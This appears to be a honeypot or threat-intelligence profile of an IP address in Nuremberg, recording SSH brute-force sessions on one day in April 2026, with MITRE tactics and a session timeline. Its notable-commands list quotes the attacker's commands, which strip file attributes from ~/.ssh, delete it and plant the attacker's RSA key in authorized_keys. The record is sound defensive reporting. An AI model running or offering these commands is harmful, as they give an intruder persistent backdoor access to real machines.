94.16.120.89

Threat Confidence
49%
Location
🇩🇪 DE / Nuremberg
ASN
AS197540 · netcup GmbH
Cloud Provider
Total Events
287
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-09 10:14 — 2026-04-09 10:51
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Initial Access
Defense Evasion
Credential Access
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
malware_dropper ×9 credential_harvester ×25 opportunistic_bruter ×9
Sessions
43 (18 with login)
Avg Depth Score
0.52
Commands Executed
27
Files Downloaded
9
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
03a80b21afa810682a776a7d42e5e6fb
SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter 0f47ce5ffe04 w4m_seattle_01 · 2026-04-09 10:51
1 50%
Malware Dropper 7712d6ce1701 w4m_seattle_01 · 2026-04-09 10:51
3 1 1 100%
Credential Harvester 10dbd46e086c w4m_seattle_01 · 2026-04-09 10:51
1 35%
Opportunistic Bruter ad7837bd56f2 w4m_seattle_01 · 2026-04-09 10:50
1 50%
Malware Dropper 784dad2e770e w4m_seattle_01 · 2026-04-09 10:50
3 1 1 100%
Credential Harvester a759e142ae3f w4m_seattle_01 · 2026-04-09 10:50
1 35%
Credential Harvester c84a4712f1c1 w4m_seattle_01 · 2026-04-09 10:48
1 35%
Credential Harvester 62398e8b89cd w4m_seattle_01 · 2026-04-09 10:47
1 35%
Credential Harvester ca2d5efbbb78 w4m_seattle_01 · 2026-04-09 10:45
1 35%
Credential Harvester dd126b0aab12 w4m_seattle_01 · 2026-04-09 10:44
1 35%
Credential Harvester c3e51f813b63 w4m_seattle_01 · 2026-04-09 10:42
1 35%
Credential Harvester c80721526845 w4m_seattle_01 · 2026-04-09 10:41
1 35%
Credential Harvester 0e168f7071e1 w4m_seattle_01 · 2026-04-09 10:39
1 35%
Malware Dropper ddd387c4bf23 w4m_seattle_01 · 2026-04-09 10:38
3 1 1 100%
Opportunistic Bruter e7a36c4e6a13 w4m_seattle_01 · 2026-04-09 10:38
1 50%
Credential Harvester 609fe27de975 w4m_seattle_01 · 2026-04-09 10:38
1 35%
Credential Harvester 8b4dd68518aa w4m_seattle_01 · 2026-04-09 10:36
1 35%
Credential Harvester 8b84e013d212 w4m_seattle_01 · 2026-04-09 10:35
1 35%
Opportunistic Bruter 7f5756e48dc8 w4m_seattle_01 · 2026-04-09 10:33
1 50%
Malware Dropper 91059f953628 w4m_seattle_01 · 2026-04-09 10:33
3 1 1 100%
Credential Harvester dbdbd9bb2a40 w4m_seattle_01 · 2026-04-09 10:33
1 35%
Opportunistic Bruter ab7de70f3a01 w4m_seattle_01 · 2026-04-09 10:32
1 50%
Malware Dropper c88704a3a327 w4m_seattle_01 · 2026-04-09 10:32
3 1 1 100%
Credential Harvester 33714639ddb0 w4m_seattle_01 · 2026-04-09 10:32
1 35%
Credential Harvester 6a19e0eaff78 w4m_seattle_01 · 2026-04-09 10:30
1 35%
Malware Dropper c66797822b6f w4m_seattle_01 · 2026-04-09 10:29
3 1 1 100%
Opportunistic Bruter 34869429584e w4m_seattle_01 · 2026-04-09 10:29
1 50%
Credential Harvester 7b27c853c2e1 w4m_seattle_01 · 2026-04-09 10:29
1 35%
Credential Harvester 66336e309e14 w4m_seattle_01 · 2026-04-09 10:27
1 35%
Credential Harvester 2bbee550174c w4m_seattle_01 · 2026-04-09 10:25
1 35%
Opportunistic Bruter 66b207ad6247 w4m_seattle_01 · 2026-04-09 10:24
1 50%
Malware Dropper 7eef08df680b w4m_seattle_01 · 2026-04-09 10:24
3 1 1 100%
Credential Harvester 597cf47cbeb4 w4m_seattle_01 · 2026-04-09 10:24
1 35%
Opportunistic Bruter e1a92e981db6 w4m_seattle_01 · 2026-04-09 10:22
1 50%
Malware Dropper 851820847f19 w4m_seattle_01 · 2026-04-09 10:22
3 1 1 100%
Credential Harvester 822762cd63ac w4m_seattle_01 · 2026-04-09 10:22
1 35%
Credential Harvester f71d1a86b697 w4m_seattle_01 · 2026-04-09 10:21
1 35%
Opportunistic Bruter 82363fb0fc01 w4m_seattle_01 · 2026-04-09 10:19
1 50%
Malware Dropper 37ce0e836b27 w4m_seattle_01 · 2026-04-09 10:19
3 1 1 100%
Credential Harvester cb7fff0bea3c w4m_seattle_01 · 2026-04-09 10:19
1 35%
Credential Harvester 33c44d4e60d9 w4m_seattle_01 · 2026-04-09 10:18
1 35%
Credential Harvester cf4c444d8671 w4m_seattle_01 · 2026-04-09 10:16
1 35%
Credential Harvester 37b8e6578e49 w4m_seattle_01 · 2026-04-09 10:14
1 35%